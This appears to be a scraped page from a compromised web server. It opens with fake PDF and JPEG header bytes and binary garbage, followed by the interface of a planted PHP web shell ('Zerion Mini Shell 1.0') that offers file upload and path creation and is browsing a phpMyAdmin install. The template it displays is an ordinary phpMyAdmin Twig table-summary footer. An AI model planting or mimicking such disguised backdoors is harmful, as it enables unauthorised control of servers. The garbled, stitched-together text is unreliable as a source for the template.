%PDF- %PDF- ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC
Mini Shell

Mini Shell

Direktori : /var/www/html/pma/templates/database/structure/
Upload File :
Create Path :
Current File : /var/www/html/pma/templates/database/structure/body_for_table_summary.twig

<tfoot id="tbl_summary_row" class="table-light">
<tr>
    <th class="d-print-none"></th>
    <th class="tbl_num text-nowrap">
        {% set num_tables_trans -%}
            {% trans %}%s table{% plural num_tables %}%s tables{% endtrans %}
        {%- endset %}
        {{ num_tables_trans|format(format_number(num_tables, 0)) }}
    </th>
    {% if server_replica_status %}
        <th>{% trans 'Replication' %}</th>
    {% endif %}
    {% set sum_colspan = db_is_system_schema ? 4 : 7 %}
    {% if num_favorite_tables == 0 %}
        {% set sum_colspan = sum_colspan - 1 %}
    {% endif %}
    <th colspan="{{ sum_colspan }}" class="d-print-none">{% trans 'Sum' %}</th>
    {% set row_count_sum = format_number(sum_entries, 0) %}
    {# If a table shows approximate rows count, display update-all-real-count anchor. #}
    {% set row_sum_url = [] %}
    {% if approx_rows is defined %}
        {% set row_sum_url = {
            'ajax_request': true,
            'db': db,
            'real_row_count_all': 'true'
        } %}
    {% endif %}
    {% if approx_rows %}
        {% set cell_text -%}
            <a href="{{ url('/database/structure/real-row-count', row_sum_url) }}" class="ajax row_count_sum">~
                {{- row_count_sum -}}
            </a>
        {%- endset %}
    {% else %}
        {% set cell_text = row_count_sum %}
    {% endif %}
    <th class="value tbl_rows font-monospace text-end">{{ cell_text }}</th>
    {% if not (properties_num_columns > 1) %}
        {# MySQL <= 5.5.2 #}
        {% set default_engine = dbi.fetchValue('SELECT @@storage_engine;') %}
        {% if default_engine is empty %}
            {# MySQL >= 5.5.3 #}
            {% set default_engine = dbi.fetchValue('SELECT @@default_storage_engine;') %}
        {% endif %}
        <th class="text-center">
            <dfn title="{{ '%s is the default storage engine on this MySQL server.'|trans|format(default_engine) }}">
                {{ default_engine }}
            </dfn>
        </th>
        <th>
            {% if database_collation is not empty %}
                <dfn title="{{ database_collation.description }} ({% trans 'Default' %})">
                    {{ database_collation.name }}
                </dfn>
            {% endif %}
        </th>
    {% endif %}

    {% if is_show_stats %}
        {% set sum = format_byte_down(sum_size, 3, 1) %}
        {% set sum_formatted = sum[0] %}
        {% set sum_unit = sum[1] %}
        <th class="value tbl_size font-monospace text-end">{{ sum_formatted }} {{ sum_unit }}</th>

        {% set overhead = format_byte_down(overhead_size, 3, 1) %}
        {% set overhead_formatted = overhead[0] %}
        {% set overhead_unit = overhead[1] %}
        <th class="value tbl_overhead font-monospace text-end">{{ overhead_formatted }} {{ overhead_unit }}</th>
    {% endif %}

    {% if show_charset %}
        <th>{{ database_charset }}</th>
    {% endif %}
    {% if show_comment %}
        <th></th>
    {% endif %}
    {% if show_creation %}
        <th class="value tbl_creation font-monospace text-end">
            {{ create_time_all }}
        </th>
    {% endif %}
    {% if show_last_update %}
        <th class="value tbl_last_update font-monospace text-end">
            {{ update_time_all }}
        </th>
    {% endif %}
    {% if show_last_check %}
        <th class="value tbl_last_check font-monospace text-end">
            {{ check_time_all }}
        </th>
    {% endif %}
</tr>
</tfoot>

Zerion Mini Shell 1.0